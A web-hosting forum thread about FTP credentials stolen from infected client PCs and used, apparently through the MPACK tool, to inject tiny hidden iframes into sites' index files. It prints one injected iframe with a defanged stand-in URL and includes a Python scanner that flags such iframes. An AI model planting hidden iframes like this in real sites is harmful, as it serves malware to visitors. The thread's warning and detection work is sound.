Site Hacked, Others Might Want To Check Theirs

liming

Perch
One of our FTP accounts was hacked and all the sites we had under it had this code injected in:

Code:
<iframe width="4" height="2"
src="http://example.com/xxxxx"></iframe>

This took place I think yesterday 7/24.

We're in the process of cleaning it but I thought I should alert any other resellers to be on the lookout.
 
This has been happening a bit with a recent batch of software exploits. It is something that we really can't block because of the fact that they do authenticate properly. Such has been happening since the first of the major Adobe bugs. We have some ideas on it for long term, but it requires a lot of changes to do and from what we've seen it would block a lot of innocents if we did too much (many of the IPs authenticating are regular DSL/cable modem users that are infected).

These FTP-based injections have been quite common for a while now and are among the most common things we face daily.

BTW, just as a matter of practice, it is a good idea to change such passwords regularly and keep software up to date to go along with it. Also, I edited the injection URL you gave so part of it is xxxxx; this is just so no one gets the idea to visit it, as most of the time (I did not visit it to verify) it distributes more trojans as well.
 
Thanks Stephen. We'll definitely be more vigilant about pw security.

And just to be safe, I changed the domain to example.com as well.
 
Mass modification of index files. On the second stage the pool of passwords harvested is used to modify certain files. We will call this stage "mass modification of index files". It looks like this stage was automated and they use a special tool, called MPACK, to install malicious IFrames. Usually only main site index documents were targeted (i.e. index.php, index.html, index.shtml, etc.). Malicious IFrames are usually installed at the beginning or at the end of the document.

To stop these kinds of attacks, always have a strong password for your FTP and control panel, and even change the FTP username to something known only by you.
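
Added example, not from the thread or its posters: a Python scan of a web root for index documents carrying the kind of tiny or hidden iframe described above, noting whether it sits near the start or end of the file. The 10-pixel threshold, the 2048-character edge window and the function names are assumptions chosen for illustration.

```python
import re
import sys
from pathlib import Path

# Thresholds are assumptions for this example, not values from the thread.
MAX_DIM = 10        # width/height at or below this many pixels counts as "tiny"
EDGE_CHARS = 2048   # window treated as "beginning or end of the document"

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""\b(width|height|src)\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
HIDDEN_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.IGNORECASE)


def suspicious_iframes(html):
    """Return the tiny or hidden iframes found in one document."""
    findings = []
    for m in IFRAME_RE.finditer(html):
        tag = m.group(0)  # opening tag only; [^>]* also spans line breaks
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(tag)}
        dims = [int(attrs[d]) for d in ("width", "height") if attrs.get(d, "").isdecimal()]
        tiny = bool(dims) and all(d <= MAX_DIM for d in dims)
        if tiny or HIDDEN_RE.search(tag):
            at_edge = m.start() < EDGE_CHARS or len(html) - m.end() < EDGE_CHARS
            findings.append({"src": attrs.get("src", ""), "offset": m.start(), "at_edge": at_edge})
    return findings


def scan_webroot(root):
    """Map each index.* file under root to its suspicious iframes."""
    results = {}
    for path in sorted(Path(root).rglob("index.*")):
        if path.is_file():
            hits = suspicious_iframes(path.read_text(errors="replace"))
            if hits:
                results[str(path)] = hits
    return results


if __name__ == "__main__":
    for name, hits in scan_webroot(sys.argv[1]).items():
        for h in hits:
            print(f"{name}: offset {h['offset']} src={h['src']} edge={h['at_edge']}")
```

A hit is a reason to compare the file against a known-good backup and to check its modification time against the FTP logs; legitimate small iframes will also be reported.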
 
While these are indeed done by bots according to the logs, most of the time the FTP password is harvested from the client's own PC to get the info of late, so it means keeping a clean PC at home/office as well.
 
Yeah, I agree with you, Stephen. Most of the time this attack is because of the virus-affected PC, and mostly people who upload files using FileZilla.
 